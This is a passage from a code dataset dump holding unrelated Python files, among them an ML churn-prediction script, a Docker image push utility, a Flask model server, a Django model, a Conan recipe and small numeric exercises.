Data Manipulation and Preprocessing\n\n# In[5]:\n\n\n#Data Manipulation\n\n#Replacing spaces with null values in total charges column\ntelcom['TotalCharges'] = telcom[\"TotalCharges\"].replace(\" \",np.nan)\n\n#Dropping null values from total charges column which contain .15% missing data \ntelcom = telcom[telcom[\"TotalCharges\"].notnull()]\ntelcom = telcom.reset_index()[telcom.columns]\n\n#convert to float type\ntelcom[\"TotalCharges\"] = telcom[\"TotalCharges\"].astype(float)\n\n#replace 'No internet service' to No for the following columns\nreplace_cols = [ 'OnlineSecurity', 'OnlineBackup', 'DeviceProtection',\n 'TechSupport','StreamingTV', 'StreamingMovies']\nfor i in replace_cols : \n telcom[i] = telcom[i].replace({'No internet service' : 'No'})\n \n#replace values\ntelcom[\"SeniorCitizen\"] = telcom[\"SeniorCitizen\"].replace({1:\"Yes\",0:\"No\"})\n\n#Tenure to categorical column\ndef tenure_lab(telcom) :\n \n if telcom[\"tenure\"] <= 12 :\n return \"Tenure_0-12\"\n elif (telcom[\"tenure\"] > 12) & (telcom[\"tenure\"] <= 24 ):\n return \"Tenure_12-24\"\n elif (telcom[\"tenure\"] > 24) & (telcom[\"tenure\"] <= 48) :\n return \"Tenure_24-48\"\n elif (telcom[\"tenure\"] > 48) & (telcom[\"tenure\"] <= 60) :\n return \"Tenure_48-60\"\n elif telcom[\"tenure\"] > 60 :\n return \"Tenure_gt_60\"\ntelcom[\"tenure_group\"] = telcom.apply(lambda telcom:tenure_lab(telcom),\n axis = 1)\n\n#Separating churn and non churn customers\nchurn = telcom[telcom[\"Churn\"] == \"Yes\"]\nnot_churn = telcom[telcom[\"Churn\"] == \"No\"]\n\n#Separating catagorical and numerical columns\nId_col = ['customerID']\ntarget_col = [\"Churn\"]\ncat_cols = telcom.nunique()[telcom.nunique() < 6].keys().tolist()\ncat_cols = [x for x in cat_cols if x not in target_col]\nnum_cols = [x for x in telcom.columns if x not in cat_cols + target_col + Id_col]\n\n\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\n\n#customer id col\nId_col = ['customerID']\n#Target columns\ntarget_col = [\"Churn\"]\n#categorical columns\ncat_cols = telcom.nunique()[telcom.nunique() < 6].keys().tolist()\ncat_cols = [x for x in cat_cols if x not in target_col]\n#numerical columns\nnum_cols = [x for x in telcom.columns if x not in cat_cols + target_col + Id_col]\n#Binary columns with 2 values\nbin_cols = telcom.nunique()[telcom.nunique() == 2].keys().tolist()\n#Columns more than 2 values\nmulti_cols = [i for i in cat_cols if i not in bin_cols]\n\n#Label encoding Binary columns\nle = LabelEncoder()\nfor i in bin_cols :\n telcom[i] = le.fit_transform(telcom[i])\n \n#Duplicating columns for multi value columns\ntelcom = pd.get_dummies(data = telcom,columns = multi_cols )\n\n#Scaling Numerical columns\nstd = StandardScaler()\nscaled = std.fit_transform(telcom[num_cols])\nscaled = pd.DataFrame(scaled,columns=num_cols)\n\n#dropping original values merging scaled values for numerical columns\ndf_telcom_og = telcom.copy()\ntelcom = telcom.drop(columns = num_cols,axis = 1)\ntelcom = telcom.merge(scaled,left_index=True,right_index=True,how = \"left\")\n\n\n\n\nfrom imblearn.over_sampling import SMOTE\ncols = [i for i in telcom.columns if i not in Id_col+target_col]\n\nsmote_X = telcom[cols]\nsmote_Y = telcom[target_col]\n\n#Split train and test data\nsmote_train_X,smote_test_X,smote_train_Y,smote_test_Y = train_test_split(smote_X,smote_Y,\n test_size = .25 ,\n random_state = 111)\n\n#oversampling minority class using smote\nos = SMOTE(random_state = 0)\nos_smote_X,os_smote_Y = 
os.fit_sample(smote_train_X,smote_train_Y)\nos_smote_X = pd.DataFrame(data = os_smote_X,columns=cols)\nos_smote_Y = pd.DataFrame(data = os_smote_Y,columns=target_col)\n\n\n\n\n\n\n\n\n#splitting train and test data \ntrain,test = train_test_split(telcom,test_size = .25 ,random_state = 111)\n \n##separating dependent and independent variables\ncols = [i for i in telcom.columns if i not in Id_col + target_col]\ntrain_X = train[cols]\ntrain_Y = train[target_col]\ntest_X = test[cols]\ntest_Y = test[target_col]\n\n\n# # 3. Common function for model prediction\n\n# In[6]:\n\n\ndef telecom_churn_prediction(algorithm,training_x,testing_x,training_y,testing_y) :\n \n #model\n algorithm.fit(training_x,training_y)\n predictions = algorithm.predict(testing_x)\n probabilities = algorithm.predict_proba(testing_x)\n \n model_accuracy = accuracy_score(testing_y,predictions)\n print (\"Accuracy Score : \",model_accuracy,\"\\n\")\n model_roc_auc = roc_auc_score(testing_y,predictions) \n print (\"Area under curve : \",model_roc_auc,\"\\n\")\n model_f1_score = f1_score(testing_y,predictions) \n print (\"F1 score: \",model_f1_score,\"\\n\")\n \n return model_accuracy,model_roc_auc,model_f1_score;\n\n\n# # 3.1. Logistic Regression\n\n# # 3.2 XG Boost Model\n\n# # 3.3 Gaussian Naive Bayes\n\n# # 3.4 KNN model\n\n# In[11]:\n\n\n\nwith mlflow.start_run(run_name='KNN'):\n \n \"\"\"ADDITIONAL CODE\"\"\"\n n_neighbors = int(sys.argv[1]) if len(sys.argv) > 20 else 5\n leaf_size = int(sys.argv[2]) if len(sys.argv) > 10 else 8\n \n knn = KNeighborsClassifier(algorithm='auto', leaf_size=leaf_size, metric='minkowski',metric_params=None, n_jobs=1, n_neighbors=n_neighbors, p=2,weights='uniform')\n model_accuracy,model_roc_auc, model_f1_score=telecom_churn_prediction(knn,os_smote_X,test_X,os_smote_Y,test_Y)\n\n \n mlflow.log_metric(\"AUC\", model_roc_auc)\n mlflow.log_metric(\"Accuracy\", model_accuracy)\n mlflow.log_metric(\"F1\", model_f1_score)\n \n \"\"\"ADDITIONAL CODE\"\"\"\n mlflow.sklearn.log_model(knn, \"knn_model\")\n mlflow.sklearn.save_model(knn, \"knn_s_model\")\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"2churn_mlflow_project.py","file_name":"2churn_mlflow_project.py","file_ext":"py","file_size_in_byte":6981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"376030185","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pandas import read_csv\n\nimport math\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\ndataframe = read_csv('D:/pycharm/PROJECT34/ML_STUDY\LSTM_learn-master/international-airline-passengers.csv',\n usecols=[1],engine='python',skip_footer=3)\ndataset = dataframe.values\ndataset = dataset.astype('float32')\ndef create_dataset(dataset,look_back = 1):\n datax,datay = [],[]\n for i in range(len(dataset)-look_back-1):\n a = dataset[i:(i+look_back),0]\n datax.append(a)\n datay.append(dataset[i+look_back,0])\n return np.array(datax),np.array(datay)\nnp.random.seed(7)\nscaler = MinMaxScaler(feature_range=(0,1))\ndataset = scaler.fit_transform(dataset)\ntrain_size = int(len(dataset)*0.67)\ntest_size = len(dataset)-train_size\ntrain,test = dataset[0:train_size,:],dataset[train_size:len(dataset),:]\n\nlook_back = 2\ntrainx,trainy = create_dataset(train,look_back)\ntestx,testy = create_dataset(test,look_back)\n\ntrainx = np.reshape(trainx,(trainx.shape[0],1,trainx.shape[1]))\n\ntestx = 
np.reshape(testx,(testx.shape[0],1,testx.shape[1]))\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test_20180301_lstm.py","file_name":"test_20180301_lstm.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650608483","text":"import requests\nimport json\nimport traceback\nimport warnings\nimport sys\nimport docker\n\nwarnings.filterwarnings(\"ignore\")\n\nrepo_ip = 'image.kaifa-empower.com'\n\nf1 = open('docker_images.txt','r')\ndocker_images = f1.readlines()\nclient = docker.from_env()\nsave_name_list = []\nfor image_name in docker_images:\n real_name = image_name.strip().split('/',1)[1]\n image = client.images.get(image_name.strip())\n image.tag(repo_ip + '/'+real_name)\n save_name_list.append( repo_ip + '/'+real_name)\nfor image in save_name_list:\n print('----push '+image+'start ----')\n client.images.push(image.strip())\n\n\nfor image_name in docker_images:\n client.images.remove(image_name.strip())\n\nfor real_name in save_name_list:\n client.images.remove(real_name)\n\n\nf1.close()\n","sub_path":"docker/push_image.py","file_name":"push_image.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"91141854","text":"from flask import Flask, render_template, request\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom tensorflow.keras.models import model_from_json\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.preprocessing import image\r\n\r\nfrom werkzeug.utils import secure_filename\r\n\r\nimport sys\r\nimport os\r\n\r\n\r\nsys.path.append(os.path.abspath('./model'))\r\n\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n\r\n\r\ndef init():\r\n json_file = open('./model/model_128_64.json', 'r')\r\n loaded_model_json = json_file.read()\r\n json_file.close()\r\n loaded_model = model_from_json(loaded_model_json)\r\n\r\n loaded_model.load_weights(\"./model/model_128_64.h5\")\r\n print(\"Loaded model from disk\")\r\n\r\n loaded_model.compile(loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\r\n optimizer='adam', metrics=['accuracy'])\r\n\r\n return loaded_model\r\n\r\nglobal model\r\n\r\nmodel = init()\r\n\r\nglobal classes\r\nclasses = pd.read_csv('./model/class_labels.csv')\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\n\r\ndef model_predict():\r\n # Get the file from post request\r\n f = request.files['file']\r\n\r\n # Save the file to ./uploads\r\n basepath = os.path.dirname(__file__)\r\n file_path = os.path.join(basepath, 'uploads', secure_filename(f.filename))\r\n f.save(file_path)\r\n print(file_path)\r\n\r\n img = image.load_img(file_path, target_size=(32,32))\r\n x = image.img_to_array(img)\r\n x = x / 255.\r\n x = x[np.newaxis, :, :, :1]\r\n\r\n out = model.predict(x)\r\n print(out)\r\n response = classes.iloc[(np.argmax(out))][1]\r\n print(response)\r\n return response\r\n\r\nif __name__ == '__main__':\r\n port = int(os.environ.get(\"PORT\", 5000))\r\n app.run(port=port)","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639741029","text":"from django.db import models\nimport pystache\n\n\nclass Dishrating(models.Model):\n kindergarten = models.ForeignKey(\n \"kindergarten.Kindergarten\",\n on_delete=models.CASCADE,\n null=True,\n 
blank=True,\n verbose_name=\"Kindergarten\",\n )\n date = models.DateField(\n null=True,\n blank=True,\n verbose_name=\"Date\",\n help_text=\"Please select the date of the dish that you wish to comment on.\",\n )\n dish = models.ForeignKey(\n \"kindergartendish.KindergartenDish\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n verbose_name=\"Choose a dish\",\n )\n children_satisfaction = models.CharField(\n choices=(\n (\"one\", \"1\"),\n (\"two\", \"2\"),\n (\"three\", \"3\"),\n (\"four\", \"4\"),\n (\"five\", \"5\"),\n ),\n max_length=5,\n null=True,\n blank=True,\n verbose_name=\"Did your child like the dish?\",\n help_text=\"(1 = „it was awful”, 5 = „it was delicious”)\",\n )\n parent_satisfaction = models.CharField(\n choices=(\n (\"one\", \"1\"),\n (\"two\", \"2\"),\n (\"three\", \"3\"),\n (\"four\", \"4\"),\n (\"five\", \"5\"),\n ),\n max_length=5,\n null=True,\n blank=True,\n verbose_name=\"Do you think it is proper for a kid?\",\n help_text=\"(1 = „it is not”, 5 = „it is”)\",\n )\n health = models.CharField(\n choices=(\n (\"one\", \"1\"),\n (\"two\", \"2\"),\n (\"three\", \"3\"),\n (\"four\", \"4\"),\n (\"five\", \"5\"),\n ),\n max_length=5,\n null=True,\n blank=True,\n verbose_name=\"Do you think it is healthy?\",\n help_text=\"(1 = „it is very bad for my health”, 5 = „it is very healthy”)\",\n )\n comment = models.TextField(\n null=True,\n blank=True,\n verbose_name=\"Do you have any further comments?\",\n )\n\n wq_label_template = \"{{dish}}\"\n\n def __str__(self):\n return pystache.render(self.wq_label_template, self)\n\n class Meta:\n verbose_name = \"dishrating\"\n verbose_name_plural = \"dishratings\"\n","sub_path":"db/dishrating/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"635997717","text":"from tkinter import *\n\ndef data_to_file():\n data_write = open (item_name_entry.get()+\".rr\", \"w\")\n data_write.write(item_name_entry.get())\n data_write.write(\"\\n\" + str(effectiveness_entry.get()))\n data_write.write(\"\\n\" + str(description_entry.get()))\n data_write.write(\"\\n\" + str(model_entry.get()))\n data_write.write(\"\\n\" + str(type_var.get()))\n data_write.close ()\n\ndef clear_entry():\n item_name_entry.delete(0, len(item_name_entry.get()))\n effectiveness_entry.delete(0, len(effectiveness_entry.get()))\n description_entry.delete(0, len(description_entry.get()))\n model_entry.delete(0, len(model_entry.get()))\n\nroot = Tk()\n#config\nroot.title(\"Strainger Form\")\nroot.configure(background=\"black\")\n\n#vars\ntype_var = StringVar(root)\ntype_var.set(\"heal\") # initial value\n\n#labels\nitem_name_label = Label(root, text=\"Item Name\", bg=\"black\", fg=\"white\").grid(row=0, column=10)\neffectiveness_label = Label(root, text=\"Effectiveness\", bg=\"black\", fg=\"white\").grid(row=1, column=10)\ndescription_label = Label(root, text=\"Description\", bg=\"black\", fg=\"white\").grid(row=2, column=10)\nmodel_label = Label(root, text=\"3d Model\", bg=\"black\", fg=\"white\").grid(row=3, column=10)\ntype_label = Label(root, text=\"Type\", bg=\"black\", fg=\"white\").grid(row=4, column=10)\n\n\n#entries\nitem_name_entry = Entry(root, bg=\"black\", fg=\"white\")\nitem_name_entry.grid(row=0)\n\neffectiveness_entry = Entry(root, bg=\"black\", fg=\"white\")\neffectiveness_entry.grid(row=1)\n\ndescription_entry = Entry(root, bg=\"black\", 
fg=\"white\")\ndescription_entry.grid(row=2)\n\nmodel_entry = Entry(root, bg=\"black\", fg=\"white\")\nmodel_entry.grid(row=3)\n\ntype_entry = OptionMenu(root, type_var, \"heal\", \"equip\", \"body\", \"other\")\ntype_entry.config(bg=\"black\", fg=\"white\", activeforeground=\"white\", activebackground=\"black\",width=15)\ntype_entry[\"menu\"].config(bg=\"black\", fg=\"white\")\ntype_entry.grid(row=4)\n\n\n#buttons\nCLEAR = Button(root, text=\"CLEAR\", bg=\"black\", fg=\"white\", activeforeground=\"white\", activebackground=\"black\",command=clear_entry, width=10).grid(row=5, column=10)\nOK = Button(root, text=\"OK\", bg=\"black\", fg=\"white\", activeforeground=\"white\", activebackground=\"black\",command=data_to_file,width=10).grid(row=6, column=10)\nroot.mainloop()\n","sub_path":"strainger_input.py","file_name":"strainger_input.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"333006449","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Laurent El Shafey \n# Fri Jan 27 16:43:40 2012 +0100\n#\n# Copyright (C) 2011-2013 Idiap Research Institute, Martigny, Switzerland\n\n\"\"\"Tests for statistical methods\n\"\"\"\n\nimport os, sys\nimport unittest\nimport bob\nimport numpy\n\nclass NorminvTest(unittest.TestCase):\n \"\"\"Tests the norminv function of bob\"\"\"\n\n def test01_norminv(self):\n\n # Reference values\n sols_d05 = -1.64485362695\n sols_d50 = 0.\n sol_m2s4_d37 = 0.672586614252\n sol_m2s4_d48 = 1.799385666141\n\n # Values obtained with bob\n b_d05 = bob.math.normsinv(0.05)\n b_d50 = bob.math.normsinv(0.5)\n b_m2s4_d37 = bob.math.norminv(0.37, 2., 4.)\n b_m2s4_d48 = bob.math.norminv(0.48, 2., 4.)\n \n # Compare\n self.assertTrue( (abs(sols_d05 - b_d05) < 1e-6), True )\n self.assertTrue( (abs(sols_d50 - b_d50) < 1e-6), True )\n self.assertTrue( (abs(sol_m2s4_d37 - b_m2s4_d37) < 1e-6), True )\n self.assertTrue( (abs(sol_m2s4_d48 - b_m2s4_d48) < 1e-6), True )\n","sub_path":"python/bob/math/test/test_norminv.py","file_name":"test_norminv.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191636763","text":"import threading\nimport cv2\nfrom time import time\n\nimport asyncio\n\nclass VideoCaptureAsync:\n def __init__(self, src=0, width=640, height=480,framerate=20,oversample=8):\n self.src = src\n self.cap = cv2.VideoCapture(self.src)\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n self.cap.set(cv2.CAP_PROP_FPS, framerate)\n\n self.grabbed, self.frame = self.cap.read()\n self.started = False\n self.read_lock = threading.Lock()\n\n self.framerate = framerate\n self.last_cap = time()\n self.oversample = oversample\n\n def set(self, var1, var2):\n self.cap.set(var1, var2)\n\n def start(self):\n if self.started:\n print('[!] 
Threaded video capturing has already been started.')\n return None\n self.started = True\n self.thread = threading.Thread(target=self.planUpdate, args=())\n self.thread.start()\n return self\n\n def planUpdate(self):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n task = loop.create_task(self.update())\n try:\n loop.run_until_complete(task)\n except asyncio.CancelledError:\n pass\n finally:\n loop.close()\n\n @asyncio.coroutine\n def update(self):\n while self.started:\n t = time()\n with self.read_lock:\n cap = t - self.last_cap >= 1/self.framerate\n if cap:\n grabbed, frame = self.cap.read()\n t = time()\n with self.read_lock:\n if cap:\n self.last_cap = t\n self.grabbed = grabbed\n self.frame = frame\n yield from asyncio.sleep(1.0/self.framerate/self.oversample)\n\n def read(self):\n with self.read_lock:\n grabbed = self.grabbed\n frame = self.frame.copy() if grabbed else self.frame\n return grabbed, frame\n\n def stop(self):\n self.started = False\n self.thread.join()\n\n def __exit__(self, exec_type, exc_value, traceback):\n self.cap.release()\n","sub_path":"server/VideoCaptureAsync.py","file_name":"VideoCaptureAsync.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"110206054","text":"from conans import ConanFile, tools\nfrom conans.errors import ConanException\nimport os\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass GnuConfigConan(ConanFile):\n name = \"gnu-config\"\n description = \"The GNU config.guess and config.sub scripts\"\n homepage = \"https://savannah.gnu.org/projects/config/\"\n url = \"https://github.com/conan-io/conan-center-index\"\n topics = (\"gnu\", \"config\", \"autotools\", \"canonical\", \"host\", \"build\", \"target\", \"triplet\")\n license = \"GPL-3.0-or-later\", \"autoconf-special-exception\"\n no_copy_source = True\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n def package_id(self):\n self.info.header_only()\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version],\n destination=self._source_subfolder, strip_root=True)\n\n def _extract_license(self):\n txt_lines = tools.load(os.path.join(self.source_folder, self._source_subfolder, \"config.guess\")).splitlines()\n start_index = None\n end_index = None\n for line_i, line in enumerate(txt_lines):\n if start_index is None:\n if \"This file is free\" in line:\n start_index = line_i\n if end_index is None:\n if \"Please send patches\" in line:\n end_index = line_i\n if not all((start_index, end_index)):\n raise ConanException(\"Failed to extract the license\")\n return \"\\n\".join(txt_lines[start_index:end_index])\n\n def package(self):\n tools.save(os.path.join(self.package_folder, \"licenses\", \"COPYING\"), self._extract_license())\n self.copy(\"config.guess\", src=self._source_subfolder, dst=\"bin\")\n self.copy(\"config.sub\", src=self._source_subfolder, dst=\"bin\")\n\n def package_info(self):\n bin_path = os.path.join(self.package_folder, \"bin\")\n self.output.info(\"Appending PATH environment variable: {}\".format(bin_path))\n self.env_info.PATH.append(bin_path)\n\n self.user_info.CONFIG_GUESS = os.path.join(bin_path, \"config.guess\")\n self.user_info.CONFIG_SUB = os.path.join(bin_path, \"config.sub\")\n","sub_path":"recipes/gnu-config/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
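# A minimal usage sketch for the VideoCaptureAsync class in the record above.
# Assumptions (not from the original record): the class is in scope, a webcam
# exists at index 0, and OpenCV can open it.
import time

cap = VideoCaptureAsync(src=0, width=640, height=480, framerate=20).start()
try:
    time.sleep(0.5)  # let the background capture loop grab a few frames first
    for _ in range(100):
        grabbed, frame = cap.read()  # non-blocking: returns the latest frame
        if grabbed:
            pass  # process `frame` here, e.g. display it or run inference on it
finally:
    cap.stop()  # stops the capture loop and joins the background thread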
+{"seq_id":"411992622","text":"from PIL import Image\nimport numpy as np\nfrom rectangle import RectangleTakeIn\nclass ImageExtractor:\n\n def __init__(self):\n print(\"code here\")\n\nimage = Image.open(\"images.jpeg\")\n\nwidth,height = image.size\nfound_pixels = []\nfor index, pixel in enumerate(image.getdata()):\n if pixel >= (255,255,255):\n found_pixels.append(index)\n\nx,y = divmod(index, width)\nfound_pixels_coords = [divmod(index, width) for index in found_pixels]\ncoords = tuple(found_pixels_coords)\n\nRectangleTakeIn(coords)\n","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"588148556","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 14 11:35:27 2017\n\n@author: ifmor\n\"\"\"\n\n#Distancia euclidiana\nimport numpy as np\n\ndatos=np.array([[0, 3, 0],\n [2, 0, 0],\n [0, 1, 3],\n [0, 1, 2],\n [-1, 0, 1],\n [1, 1, 1],\n [0, 0, 0]])\n\neuclid = []\n\nfor i in range(6):\n \n resta=datos[-1]-datos[i]\n cuadrado=resta**2\n eucl=np.sqrt(cuadrado.sum(axis=0))\n euclid.append(eucl)\n\nprint(resta)\nprint(cuadrado)\nprint(eucl)\nprint(euclid)\n","sub_path":"Taller 1/Distancia euclidiana.py","file_name":"Distancia euclidiana.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"425717590","text":"import awswrangler\n\n\ndef lambda_handler(event, context):\n\n bucket = event.get(\"--bucket\")\n key = event.get(\"--workload\")\n output_name = key.replace(\".csv\", \"\")\n path_input = \"s3://\" + bucket + \"/\" + key\n path_output = \"s3://\" + bucket + \"/lambda_output/\" + output_name\n\n print(\"bucket: \" + bucket)\n print(\"key: \" + key)\n print(\"output_name: \" + output_name)\n print(\"path_input: \" + path_input)\n print(\"path_output: \" + path_output)\n\n df = awswrangler.s3.read(path=path_input)\n awswrangler.s3.write(\n df=df, path=path_output, file_format=\"parquet\", partition_cols=[\"col3\"]\n )\n","sub_path":"benchmarks/serverless_etl/etls/lambda_script.py","file_name":"lambda_script.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529606179","text":"import sys\nfrom collections import deque\n\nsys.stdin = open(\"input.txt\", \"r\")\n\nT = int(input().rstrip())\ndef initial_check(W):\n for i in str(W):\n if int(i) not in number:\n return False\n return True\n\ndef operator_func(cur_num, i, prev_opr):\n if prev_opr == 1:\n ans = cur_num + i\n elif prev_opr == 2:\n ans = cur_num - i\n elif prev_opr == 3:\n ans = cur_num * i\n else:\n ans = cur_num // i\n return ans\n\n\ndef bfs(List):\n global min_num, max_num,W, min_touch_count\n while List:\n current = List.popleft()\n cur_num = current[0] #지금까지 숫자\n next = current[1] #연산해야할 숫자\n prev_opr =current[2] #이전에 했던 연산 (0 이면 숫자고른거, 아니면 이전에 했던 연산)\n opr_count =current[3] #연산 count\n very_prev_opr = current[4]\n touch_count = current[5]\n\n if touch_count >= min_touch_count:\n return 100000\n\n if prev_opr == 0:\n for j in operator:\n if opr_count == 1:\n next_num = operator_func(cur_num,next,very_prev_opr)\n if next_num == W:\n return touch_count + 1\n List.append((next_num,0,j,1,j,touch_count+1))\n else:\n List.append((cur_num,next,j,opr_count+1,j,touch_count+1))\n for i in number:\n next_num = int(str(next) + str(i))\n if next_num !=0 and min_num < next_num < max_num:\n 
List.append((cur_num,next_num,0,opr_count,very_prev_opr,touch_count+1))\n elif prev_opr !=0:\n for i in number:\n next_num = int(str(next) + str(i))\n if next_num !=0 and min_num < next_num < max_num:\n List.append((cur_num,next_num,0,opr_count,very_prev_opr,touch_count+1))\n\n\nfor test in range(1,T+1):\n #터치가능한 숫자들의 개수, 터치 가능한 연산자들의 개수, 최대 터치가능한 횟수\n N,O,M = tuple(map(int,input().rstrip().split()))\n number =[int(i) for i in input().rstrip().split()] # 터치가능한 숫자들\n operator = [int(i) for i in input().rstrip().split()] #터치가능한 연산자 (+:1,-:2, *:3, /:4)\n W = int(input().rstrip()) #원하는 숫자\n min_num, max_num = -1, 1000\n min_touch_count = M+1\n\n if initial_check(W):\n min_touch_count =len(str(W))\n print(min_touch_count)\n continue\n else:\n for cur in number:\n List = deque()\n List.append((cur,0,0,0,0,1))\n touch_count = bfs(List)\n if touch_count+1 < min_touch_count:\n min_touch_count = touch_count+1\n if min_touch_count == M+1:\n print(-1)\n else:\n print(min_touch_count)\n","sub_path":"4311. [연습문제] 오래된 스마트폰.py","file_name":"4311. [연습문제] 오래된 스마트폰.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"323132051","text":"\n#################################-- restart Script --#################################\n## This section tries for arduino connection on a specified port ##\n######################################################################################\n\n\n#! /bin/env python3\nimport os\nimport sys\n\ndef like_cheese():\n var = input(\"Hi! I like cheese! Do you like cheese?\").lower()\n if var == \"yes\":\n print(\"That's awesome!\")\n\nif __name__ == '__main__':\n like_cheese()\n os.execv(__file__, sys.argv) # Run a new iteration of the current script, providing any command line args from the current iteration.\n","sub_path":"scripts/Base_Build_Systems/HVAC/restart_script.py","file_name":"restart_script.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"348031496","text":"#coding:utf-8\n\n# 20151221作成。\n# GECCO2のデータを読み込むためのモジュール。\n\nnz=50\nnx=360\nny=180\n\n\ndef nc_read(year,month,var,depth):\n\t# 1地点につき1つのデータしかないものに関してはdepthに何を入れても構わない。\n\t# 50層あるデータに関しては、depth=1とすると、5メートル水深でのデータが得られるようにする。\n\timport netCDF4\n\timport numpy as np\n\timport subroutine\n\timport GECCO2\n\ta=subroutine.read_meta_data('var')\n\tfilename=subroutine.celldata(a,'var',var,'GECCO2_fn')\n\td=subroutine.celldata(a,'var',var,'dim')\n\tncfile=subroutine.dat_dir()+'GECCO2/NetCDF/'+filename+'29_34_55.nc'\n\tn=GECCO2.ym_to_n(year,month)\n\t# print ncfile\n\tnc=netCDF4.Dataset(ncfile,'r')\n\tif d=='3D':\n\t\tif depth != 0:\n\t\t\tdata=nc.variables[filename][n,depth-1,:,:]\n\t\t\tdata=np.reshape(data,(ny,nx))\n\t\telse:\n\t\t\tdata=np.ones((ny,nx,nz))\n\t\t\tfor k in range(0,nz):\n\t\t\t\tdata_2D=nc.variables[filename][n,k,:,:]\n\t\t\t\tdata[:,:,k]=np.reshape(data_2D,(ny,nx))\n\telif d=='2D':\n\t\tdata=nc.variables[filename][n,:,:]\n\t\tdata=np.reshape(data,(ny,nx))\n\n\tnc.close()\n\treturn data\n\ndef grib_read(year,month,var,depth):\n\timport numpy as np\n\timport subroutine\n\timport 
GECCO2\n\tdata_dir=subroutine.dat_dir()+'GECCO2/binary/each_data/'\n\tformat_of_data=\"<\"+str(nx*ny)+\"f\"\n\ta=subroutine.read_meta_data('var')\n\tfilename=subroutine.celldata(a,'var',var,'GECCO2_fn')\n\td=subroutine.celldata(a,'var',var,'dim')\n\tdt=np.dtype([(\"data\",format_of_data)])\n\tstryear,strmonth=subroutine.strym(year,month)\n\tfd=open(data_dir+\"/\"+stryear+strmonth+\"/\"+filename+\".out\",\"r\")\n\tif d=='3D':\n\t\tcount=nz\n\telif d=='2D':\n\t\tcount=1\n\tchunk=np.fromfile(fd,dtype=dt,count=count)\n\tif depth != 0:\n\t\tdata=chunk[depth-1]['data']\n\t\tdata=np.reshape(data,(ny,nx))\n\telse:\n\t\tdata=np.ones((ny,nx,nz))\n\t\tfor k in range(0,nz):\n\t\t\tdata_2D=chunk[k]['data']\n\t\t\tdata[:,:,k]=np.reshape(data_2D,(ny,nx))\n\treturn data\n\n\ndef n_to_ym(n):\t\t\t\t\t# n=0 ->1948年1月、n=803 -> 2014年12月\n\tyear=n//12+1947\n\tmonth=n%12+1\n\treturn [year,month]\n\ndef ym_to_n(year,month):\t\t# 1948年1月 -> n=0, 2014年12月 -> n=803\n\treturn (year-1948)*12+(month-1)\n\ndef get_grid_value(var): # 荒川Cグリッドだからややこしい\n\t# しかもwのzgridも通常とは異なる様子。水温や塩分の鉛直座標のちょうど中間をとっている。これに関しては今回無視することとする。\n\timport netCDF4\n\timport subroutine\n\ta=subroutine.read_meta_data('var')\n\tfilename=subroutine.celldata(a,'var',var,'GECCO2_fn')\n\tncfile=subroutine.dat_dir()+'GECCO2/NetCDF/'+filename+'29_34_55.nc'\n\tnc=netCDF4.Dataset(ncfile,'r')\n\tvar_p=nc.variables['Depth'][:]\n\txgrid=nc.variables['lon'][:]\n\tygrid=nc.variables['lat'][:]\n\tnc.close()\n\treturn 